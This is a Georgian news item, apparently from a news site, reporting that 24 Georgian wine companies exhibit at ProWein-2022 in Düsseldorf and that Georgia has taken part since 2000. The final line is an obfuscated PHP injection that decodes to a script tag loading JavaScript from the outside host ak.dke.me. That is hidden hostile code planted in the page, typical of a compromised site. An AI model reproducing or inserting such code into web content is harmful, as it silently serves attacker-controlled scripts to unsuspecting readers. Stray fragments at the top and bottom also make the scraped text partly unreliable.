celsiusi
ავერსი შნაიდერი
15-17 მაისს, გერმანიის ქალაქ დიუსელდორფში, ღვინისა და ალკოჰოლიანი სასმელების საერთაშორისო გამოფენა „ProWein-2022“ იმართება. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIMS ღვინის ეროვნული სააგენტოდან აცნობეს.
 
ღვინის ეროვნული სააგენტოს მხარდაჭერით და ასოციაციის „ქართული ღვინო“ ორგანიზებით, გამოფენაში ქართულიღვინის მწარმოებელი 24 კომპანია მონაწილეობს. 
 
„ProWein” 1994 წლიდან ტარდება და ის მსოფლიოში ღვინისა და ალკოჰოლიანი სასმელების ერთ-ერთი ყველაზე მნიშვნელოვანი გამოფენა და ღვინის მწარმოებლებისთვის წლის მთავარიმოვლენაა.
 
აღსანიშნავია, რომ მსოფლიო ბაზარზე ქართული პროდუქციის პოპულარიზაციისა და ცნობადობის ამაღლების ხელშეწყობის მიზნით, აღნიშნულ გამოფენაში საქართველო 2000 წლიდან მონაწილეობს. 
 
თავდაპირველად, საქართველოდან გამოფენაში მონაწილეობას მხოლოდ 5 კომპანია იღებდა. გამოფენის მასშტაბებიდან და მნიშვნელობიდან გამომდინარე, ქართული კომპანიების მხრიდან ინტერესი მზარდია, შესაბამისად, მზარდია მონაწილე კომპანიების რაოდენობაც."– აღნიშნავენ ღვინის ეროვნულ სააგენტოში. 
 
 
763
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");